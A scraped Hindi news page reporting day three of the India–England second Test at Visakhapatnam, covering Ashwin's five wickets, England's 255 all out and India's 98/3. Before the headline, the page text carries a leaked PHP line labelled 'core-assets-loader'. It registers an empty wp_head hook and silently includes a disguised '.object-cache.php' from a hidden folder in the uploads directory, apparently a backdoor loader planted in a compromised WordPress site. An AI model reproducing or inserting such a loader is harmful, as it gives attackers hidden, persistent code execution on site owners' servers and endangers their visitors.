add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); इंग्लैंड पर दबाव बनाने के लिए बड़ा लक्ष्य तय करने उतरी टीम इंडिया – SOCH INDIA
Menu

खेल
इंग्लैंड पर दबाव बनाने के लिए बड़ा लक्ष्य तय करने उतरी टीम इंडिया

nobanner

तीसरे दिन का खेल:

IND: 98/3 विराट 56, रहाणे 22*

विशाखापट्नम: रविचंद्रन अश्विन (67/5) की शानदार गेंदबाजी के बाद कप्तान विराट कोहली (नाबाद 56) के दम पर भारतीय क्रिकेट टीम ने इंग्लैंड के खिलाफ चल रहे दूसरे टेस्ट के तीसरे दिन शनिवार को इंग्लैंड पर 298 रनों की बढ़त हासिल कर ली है. तीसरे दिन अश्विन की अगुवाई में भारतीय गेंदबाजों ने इंग्लैंड की पहली पारी 255 रनों पर समेट दी और उसके बाद अपनी दूसरी पारी में तीन विकेट खोकर 98 रन बनाते हुए मैच पर शिकंजा कसना शुरू कर दिया है.

भारत ने हालांकि मुरली विजय (3), लोकेश राहुल (10) और चेतेश्वर पुजारा (1) के रूप में अपने शुरुआती तीन विकेट सस्ते में गंवा दिए. जिसके बाद रहाणे और कप्तान कोहली ने मोर्चा संभाला.

भारत ने पहली पारी के आधार पर 200 रनों की बढ़त ले ली थी, लेकिन इंग्लैंड को फॉलोआन खेलने का न्यौता नहीं दिया.

तीसरे दिन का पहला सत्र इंग्लैंड के नाम रहा. पांच विकेट पर 103 रनों से आगे खेलने उतरी इंग्लैंड ने इस सत्र में जॉनी बेयरस्टो (53) के रूप में एकमात्र विकेट गंवाते हुए अपने स्कोर में 88 रन जोड़े. बेयरस्टो और बेन स्टोक्स (70) ने छठे विकेट के लिए 110 रनों की साझेदारी की.

हालांकि इसके बाद दूसरे सत्र में इंग्लैंड ने अपने शेष चार विकेट जल्दी-जल्दी गंवा दिए. दूसरे सत्र में गिरे इन चार विकेटों में तीन विकेट अश्विन ने लिए. आदिल राशिद 32 रन बनाकर अंत तक नाबाद रहे. जोए रूट (53) ने भी अर्धशतकीय योगदान दिया.